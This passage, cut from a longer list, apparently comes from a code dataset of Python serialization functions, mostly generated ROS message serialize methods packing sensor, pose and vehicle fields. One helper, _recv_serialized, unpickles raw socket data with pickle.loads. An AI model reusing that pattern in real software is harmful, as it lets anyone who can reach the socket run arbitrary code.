(type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = 
len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_I3f2d13fH().pack(_x.sample_count, _x.ekf_roll, _x.ekf_pitch, _x.ekf_yaw, _x.ekf_lat, _x.ekf_lon, _x.ekf_alt, _x.ekf_vN, _x.ekf_vE, _x.ekf_vD, _x.ekf_vX, _x.ekf_vY, _x.ekf_vZ, _x.rad_gyro_X, _x.rad_gyro_Y, _x.rad_gyro_Z, _x.angular_acc_X, _x.angular_acc_Y, _x.angular_acc_Z, _x.alt_DVL))\n _x = self.dvl_error_code\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_B9f2i7f().pack(_x.flag_to_check, _x.imu_deg_gyro_X, _x.imu_deg_gyro_Y, _x.imu_deg_gyro_Z, _x.imu_mag_X, _x.imu_mag_Y, _x.imu_mag_Z, _x.imu_acc_X, _x.imu_acc_Y, _x.imu_acc_Z, _x.gps_lat, _x.gps_lon, _x.gps_alt, _x.gps_vN, _x.gps_vE, _x.gps_vD, _x.dvl_vX, _x.dvl_vY, _x.dvl_vZ))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n length = len(self.objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.objects:\n _v1 = val1.header\n buff.write(_struct_I.pack(_v1.seq))\n _v2 = _v1.stamp\n _x = _v2\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.object_class\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.confidence))\n _v3 = val1.roi\n _x = _v3\n buff.write(_struct_4IB.pack(_x.x_offset, _x.y_offset, _x.height, _x.width, _x.do_rectify))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3B.pack(_x.gear, _x.front_diff, _x.rear_diff))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def send_message(self, proto_buf):\n # print 'sending....'\n #s = message.SerializeToString()\n # packed_len = struct.pack(self.packformat, len(message))\n message = proto_buf.SerializeToString()\n packed_len = str(len(message) + 100000000)\n server_log.debug(\"Sending msg of length: {0}\".format(packed_len))\n self.sock.sendall(packed_len + message)", "def serialize(self, buff):\n try:\n buff.write(_struct_B.pack(self.success))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' 
when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_I().pack(self.vehicle_id.id))\n _x = self.vehicle_id.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_21f().pack(_x.left_size, _x.right_size, _x.front_size, _x.rear_size, _x.min_height, _x.max_height, _x.payload, _x.max_pos_x_vel, _x.max_neg_x_vel, _x.max_pos_x_acc, _x.max_neg_x_acc, _x.max_pos_y_vel, _x.max_neg_y_vel, _x.max_pos_y_acc, _x.max_neg_y_acc, _x.max_pos_ang_vel, _x.max_neg_ang_vel, _x.velocity_control_sensitivity, _x.min_turning_radius, _x.batt_capacity, _x.batt_max_voltage))\n _x = self.vehicle_type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.vendor\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.action_capability)\n buff.write(_struct_I.pack(length))\n for val1 in self.action_capability:\n _x = val1\n buff.write(_get_struct_2B().pack(_x.category, _x.action))\n length = len(val1.attributes)\n buff.write(_struct_I.pack(length))\n for val2 in val1.attributes:\n _x = val2.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _serialize_buffer(buffer, array_serialization=None):\n if array_serialization == 'binary':\n # WARNING: in NumPy 1.9, tostring() has been renamed to tobytes()\n # but tostring() is still here for now for backward compatibility.\n return buffer.ravel().tostring()\n elif array_serialization == 'base64':\n return {'storage_type': 'base64',\n 'buffer': base64.b64encode(buffer).decode('ascii')\n }\n raise ValueError(\"The array serialization method should be 'binary' or \"\n \"'base64'.\")", "def _to_cpp(self, msg):\n buf = BytesIO()\n msg.serialize(buf)\n value = buf.getvalue()\n return value", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgEcdsaSignatureDepA._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def _tobuffer(self, object_):\n\n 
raise NotImplementedError", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_q6d().pack(_x.control.mode, _x.control.duty_cycle, _x.control.current, _x.control.brake, _x.control.speed, _x.control.position, _x.control.servo))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_12d().pack(_x.sensor_pose_on_robot.position.x, _x.sensor_pose_on_robot.position.y, _x.sensor_pose_on_robot.position.z, _x.sensor_pose_on_robot.orientation.x, _x.sensor_pose_on_robot.orientation.y, _x.sensor_pose_on_robot.orientation.z, _x.sensor_pose_on_robot.orientation.w, _x.min_sensor_distance, _x.max_sensor_distance, _x.sensor_std_range, _x.sensor_std_yaw, _x.sensor_std_pitch))\n length = len(self.sensed_data)\n buff.write(_struct_I.pack(length))\n for val1 in self.sensed_data:\n _x = val1\n buff.write(_get_struct_3di().pack(_x.range, _x.yaw, _x.pitch, _x.id))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_B4bB.pack(_x.sbpl_wait_flag, _x.sbpl_present_x, _x.sbpl_present_y, _x.sbpl_new_x, _x.sbpl_new_y, _x.start_P3DX_motion))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_Q8d().pack(_x.detection_id, _x.confidence, _x.pose.pose.position.x, _x.pose.pose.position.y, _x.pose.pose.position.z, _x.pose.pose.orientation.x, _x.pose.pose.orientation.y, _x.pose.pose.orientation.z, _x.pose.pose.orientation.w))\n buff.write(_get_struct_36d().pack(*self.pose.covariance))\n _x = self\n buff.write(_get_struct_5d().pack(_x.height, _x.bbox_x, _x.bbox_y, _x.bbox_w, _x.bbox_h))\n _x = self.modality\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.embed_vector)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *self.embed_vector))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_2i16dih().pack(_x.Timestamp_sec, _x.Timestamp_nsec, 
_x.Roll, _x.Pitch, _x.Yaw, _x.Wx, _x.Wy, _x.Wz, _x.AcelX, _x.AcelY, _x.AcelZ, _x.VelN, _x.VelE, _x.VelZ, _x.GPSLong, _x.GPSLat, _x.GPSAlt, _x.Temp, _x.IMUTime, _x.BITStatus))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.Header.seq, _x.Header.stamp.secs, _x.Header.stamp.nsecs))\n _x = self.Header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2hHBI().pack(_x.x_pos, _x.y_pos, _x.angle, _x.code_type, _x.code_num))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_12d2f3d().pack(_x.position.x, _x.position.y, _x.position.z, _x.approach.x, _x.approach.y, _x.approach.z, _x.binormal.x, _x.binormal.y, _x.binormal.z, _x.axis.x, _x.axis.y, _x.axis.z, _x.width.data, _x.score.data, _x.sample.x, _x.sample.y, _x.sample.z))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_B12d.pack(_x.visible, _x.x, _x.y, _x.z, _x.u, _x.v, _x.w, _x.phi, _x.theta, _x.psi, _x.p, _x.q, _x.r))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize(self, buff):\n try:\n _x = self.group\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_2B().pack(_x.rand_start, _x.current_start))\n length = len(self.start_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *self.start_pos))\n buff.write(_get_struct_B().pack(self.rand_target))\n length = len(self.target_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *self.target_pos))\n _x = self\n buff.write(_get_struct_3Bb().pack(_x.execute, _x.wait, _x.ret_plan, _x.ret_fps))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_7q.pack(_x.s_x, _x.s_y, _x.f_x, _x.f_y, _x.step_size, _x.bias_param, 
_x.max_iteration))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self):\n self._messageBuf = bytearray()\n self._writeInt32(self.world.time)\n self._writeBool(self.world.isDay)\n self._writeByte(self.world.moonPhase)\n self._writeBool(self.world.isBloodMoon)\n self._writeInt32(self.world.width)\n self._writeInt32(self.world.height)\n self._writeInt32(self.world.spawn[0])\n self._writeInt32(self.world.spawn[1])\n self._writeInt32(self.world.worldSurface)\n self._writeInt32(self.world.rockLayer)\n self._writeInt32(self.world.worldId)\n self._writeByte(self.world.getBossFlag())\n # write the raw name\n self._messageBuf.extend(self.world.name)\n return Message.serialize(self)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_9f.pack(_x.c0.x, _x.c0.y, _x.c0.z, _x.c1.x, _x.c1.y, _x.c1.z, _x.c2.x, _x.c2.y, _x.c2.z))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgEcdsaCertificate._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_H6B5f2Bf.pack(_x.sensorId, _x.id, _x.length, _x.width, _x.measstat, _x.existprob, _x.dynprop, _x.latdisp, _x.longdisp, _x.relxdot, _x.relxddot, _x.latspeed, _x.obsprob, _x.rollcount, _x.rcs))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n buff.write(_struct_B.pack(self.type))\n _x = self.model\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.head_version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.body_version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.arm_version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2B3i.pack(_x.has_laser, _x.has_extended_arms, _x.number_of_legs, 
_x.number_of_arms, _x.number_of_hands))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def bencode_buffer(data):\n\twith BytesIO() as f:\n\t\tbencode(data, f)\n\t\treturn f.getvalue()", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3B4IH3B.pack(_x.sysid, _x.compid, _x.limits_state, _x.last_trigger, _x.last_action, _x.last_recovery, _x.last_clear, _x.breach_count, _x.mods_enabled, _x.mods_required, _x.mods_triggered))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_14d.pack(_x.u0, _x.h0, _x.vl, _x.i0, _x.wv, _x.wh, _x.wi, _x.h_stop, _x.T_gap, _x.v_max, _x.v_min, _x.h_min, _x.i_max, _x.i_min))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self.time\n buff.write(_get_struct_d().pack(_x))\n length = len(self.q_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.q_target))\n length = len(self.qd_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.qd_target))\n length = len(self.qdd_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.qdd_target))\n length = len(self.i_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.i_target))\n length = len(self.m_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.m_target))\n length = len(self.q_actual)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.q_actual))\n length = len(self.qd_actual)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.qd_actual))\n length = len(self.i_actual)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.i_actual))\n length = len(self.tool_acc_values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.tool_acc_values))\n length = len(self.tcp_force)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.tcp_force))\n length = len(self.tool_vector)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.tool_vector))\n length = len(self.tcp_speed)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.tcp_speed))\n _x = self.digital_input_bits\n buff.write(_get_struct_d().pack(_x))\n length = len(self.motor_temperatures)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.motor_temperatures))\n _x = self\n 
buff.write(_get_struct_3d().pack(_x.controller_timer, _x.test_value, _x.robot_mode))\n length = len(self.joint_modes)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(struct.pack(pattern, *self.joint_modes))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_d2H9d5fdI().pack(_x.Time, _x.Week, _x.Status, _x.RPY.x, _x.RPY.y, _x.RPY.z, _x.LLA.x, _x.LLA.y, _x.LLA.z, _x.NedVel.x, _x.NedVel.y, _x.NedVel.z, _x.YawUncertainty, _x.PitchUncertainty, _x.RollUncertainty, _x.PosUncertainty, _x.VelUncertainty, _x.SyncInTime, _x.SyncInCount))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3B4f2h3B().pack(_x.MatchMode, _x.MatchType, _x.TestMode, _x.pointA.x, _x.pointA.y, _x.pointB.x, _x.pointB.y, _x.angleA, _x.angleB, _x.idA, _x.idB, _x.kickforce))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_56B().pack(_x.command, _x.set_num, _x.paraset_byte54, _x.paraset_byte53, _x.paraset_byte52, _x.paraset_byte51, _x.paraset_byte50, _x.paraset_byte49, _x.paraset_byte48, _x.paraset_byte47, _x.paraset_byte46, _x.paraset_byte45, _x.paraset_byte44, _x.paraset_byte43, _x.paraset_byte42, _x.paraset_byte41, _x.paraset_byte40, _x.paraset_byte39, _x.paraset_byte38, _x.paraset_byte37, _x.paraset_byte36, _x.paraset_byte35, _x.paraset_byte34, _x.paraset_byte33, _x.paraset_byte32, _x.paraset_byte31, _x.paraset_byte30, _x.paraset_byte29, _x.paraset_byte28, _x.paraset_byte27, _x.paraset_byte26, _x.paraset_byte25, _x.paraset_byte24, _x.paraset_byte23, _x.paraset_byte22, _x.paraset_byte21, _x.paraset_byte20, _x.paraset_byte19, _x.paraset_byte18, _x.paraset_byte17, _x.paraset_byte16, _x.paraset_byte15, _x.paraset_byte14, _x.paraset_byte13, _x.paraset_byte12, _x.paraset_byte11, _x.paraset_byte10, _x.paraset_byte9, _x.paraset_byte8, 
_x.paraset_byte7, _x.paraset_byte6, _x.paraset_byte5, _x.paraset_byte4, _x.paraset_byte3, _x.paraset_byte2, _x.paraset_byte1))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _recv_serialized(self, socket):\n msg = pickle.loads(socket.recv())\n return msg", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_didid.pack(_x.distance_front, _x.angle_front, _x.distance_back, _x.angle_back, _x.turn_left))\n _x = self.turn_left_sensor\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_d.pack(self.turn_right))\n _x = self.turn_right_sensor\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def _write_message(self, message):\n raw_data = message.serialize()\n debug(\"writing outgoing message of type \" + message.__class__.__name__)\n self.request.sendall(raw_data)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2B6f2Bb().pack(_x.status, _x.index, _x.range, _x.range_rate, _x.range_accl, _x.azimuth, _x.lateral_rate, _x.width, _x.is_mr_update, _x.is_lr_update, _x.amplitude))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.x.header.seq, _x.x.header.stamp.secs, _x.x.header.stamp.nsecs))\n _x = self.x.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_7d3I().pack(_x.x.pose.position.x, _x.x.pose.position.y, _x.x.pose.position.z, _x.x.pose.orientation.x, _x.x.pose.orientation.y, _x.x.pose.orientation.z, _x.x.pose.orientation.w, _x.x_desi.header.seq, _x.x_desi.header.stamp.secs, _x.x_desi.header.stamp.nsecs))\n _x = self.x_desi.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_7d3I().pack(_x.x_desi.pose.position.x, _x.x_desi.pose.position.y, _x.x_desi.pose.position.z, _x.x_desi.pose.orientation.x, _x.x_desi.pose.orientation.y, _x.x_desi.pose.orientation.z, _x.x_desi.pose.orientation.w, _x.x_desi_filtered.header.seq, _x.x_desi_filtered.header.stamp.secs, _x.x_desi_filtered.header.stamp.nsecs))\n _x = self.x_desi_filtered.header.frame_id\n length = 
len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_31d().pack(_x.x_desi_filtered.pose.position.x, _x.x_desi_filtered.pose.position.y, _x.x_desi_filtered.pose.position.z, _x.x_desi_filtered.pose.orientation.x, _x.x_desi_filtered.pose.orientation.y, _x.x_desi_filtered.pose.orientation.z, _x.x_desi_filtered.pose.orientation.w, _x.x_err.linear.x, _x.x_err.linear.y, _x.x_err.linear.z, _x.x_err.angular.x, _x.x_err.angular.y, _x.x_err.angular.z, _x.xd.linear.x, _x.xd.linear.y, _x.xd.linear.z, _x.xd.angular.x, _x.xd.angular.y, _x.xd.angular.z, _x.xd_desi.linear.x, _x.xd_desi.linear.y, _x.xd_desi.linear.z, _x.xd_desi.angular.x, _x.xd_desi.angular.y, _x.xd_desi.angular.z, _x.F.force.x, _x.F.force.y, _x.F.force.z, _x.F.torque.x, _x.F.torque.y, _x.F.torque.z))\n length = len(self.tau_pose)\n 